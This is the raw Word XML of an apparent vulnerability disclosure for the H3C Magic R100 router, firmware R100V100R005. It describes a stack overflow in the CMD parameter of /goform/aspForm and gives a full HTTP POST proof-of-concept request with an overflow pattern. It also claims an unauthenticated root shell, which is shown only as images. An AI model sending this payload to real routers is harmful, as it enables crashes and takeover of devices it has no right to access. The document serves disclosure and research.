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3.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId3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Xc567e68336363397bbd9b985cba1fb7139e771b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H3C magic R100 R100V100R005.bin Stack overflow vulnerability</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="overview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manufacturer's website information：</w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.h3c.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firmware download address ：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.h3c.com/cn/d_201801/1060028_30005_0.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="26" w:name="Xd35e911cb78dfdf796618ef90216a2251dcbb8b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Affected version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2399687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Users/rencvn/Desktop/IOT_vuln/H3C/magicR100/3/img/image-20220513172345635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9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Figure 1 shows the latest firmware Ba of the router</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="30" w:name="vulnerability-details"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="159801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/Users/rencvn/Desktop/IOT_vuln/H3C/magicR100/3/img/image-20220513173203949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8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The content obtained by the program through the CMD parameter is passed to V11, and then V11 is copied into byte through the strcpy function_ In 4aaf00, there is no size check, and there is a buffer overflow vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="37" w:name="recurring-vulnerabilities-and-poc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recurring vulnerabilities and POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In order to reproduce the vulnerability, the following steps can be followed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the fat simulation firmware R100V100R005.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack with the following POC attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /goform/aspForm HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin: http://192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Pragma: no-cache</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cache-Control: no-cache</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4020765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/Users/rencvn/Desktop/IOT_vuln/H3C/magicR100/3/img/image-20220409145136340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0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Figure 2 POC attack effect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, you can write exp, which can obtain a stable root shell without authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3632886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/Users/rencvn/Desktop/IOT_vuln/H3C/magicR100/3/img/image-2022051317280950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2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image" Id="rId34" Target="media/rId34.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId27" Target="media/rId27.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId20" Target="https://www.h3c.com/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://www.h3c.com/cn/d_201801/1060028_30005_0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h3c.com/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://www.h3c.com/cn/d_201801/1060028_30005_0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2022-05-13T11:44:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-13T11:44:23Z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